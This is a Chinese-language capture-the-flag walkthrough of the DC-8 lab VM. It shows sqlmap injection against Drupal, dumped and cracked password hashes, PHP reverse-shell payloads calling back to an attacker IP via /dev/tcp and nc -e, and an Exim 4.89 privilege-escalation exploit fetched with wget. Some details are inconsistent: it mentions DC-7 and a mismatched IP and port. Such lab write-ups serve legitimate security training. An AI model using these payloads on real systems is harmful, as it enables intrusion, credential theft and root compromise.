kali的IP地址:192.168.200.14
DC-8的IP地址:192.168.200.13(一个flag)
靶机和攻击机处于同一个网络方式:nat或桥接
若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容
1、扫描同网段存活主机
第一种方式:
arp-scan -l
第二种方式:
netdiscover -r 192.168.200.0/24
2、开放端口探测
nmap -sV -p- 192.168.200.13
开放端口有两个:22(SSH服务默认端口)和80(http默认端口)
3.目录扫描
查看robots。txt文件
这些禁止爬取的文件基本上都访问不了
访问web页面
和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的
不过页面中存在这样的三个不同的URL:
可能存在文件包含和SQL注入的漏洞
SQLMAP
1、扫描数据库
sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch
2、查询数据表名
sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch
3、查询字段名
sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch
4、查询字段值
sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump
账号:admin
密码:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
账号:john
密码:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
1.爆破密码密文
Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中
vim password.txt
爆破出来密文:turtle
试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了
2.反弹shell
先用获得的密码:turtle登录,试试登录后台,应该是john的密码
登录成功!
还是运用上一靶场的方法,找一找能上传一句话木马的php文件
连不上。然后显示phpinfo的地址死活没反应
直接获取shell
PHP反弹 shell(Post 请求发送命令)
<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?> #交互式shell
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?> #交互式shell
<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?>
将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码
成功反弹shell
3.提权
查一下suid权限的二进制文件
find / -perm -4000 -print 2>/dev/null
查询Exim 版本为4.89
利用kali搜索EXP
不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)
cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh
开启http服务
python -m http.server 8899
注:交互页面,方便后续操作
python -c 'import pty;pty.spawn("/bin/bash")'
在DC-7中下载该文件
wget //192.168.200.57:8888/shell.sh
文件权限是无执行权限的,赋予执行权限
chmod 777 shell.sh
赋予可执行权限
接着根据sh脚本提示,执行文件
./shell.sh
不过奇怪的是,执行完之后还是普通权限
查看脚本的使用规则,又两个参数可用
将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功
近到root目录,查看最终flag内容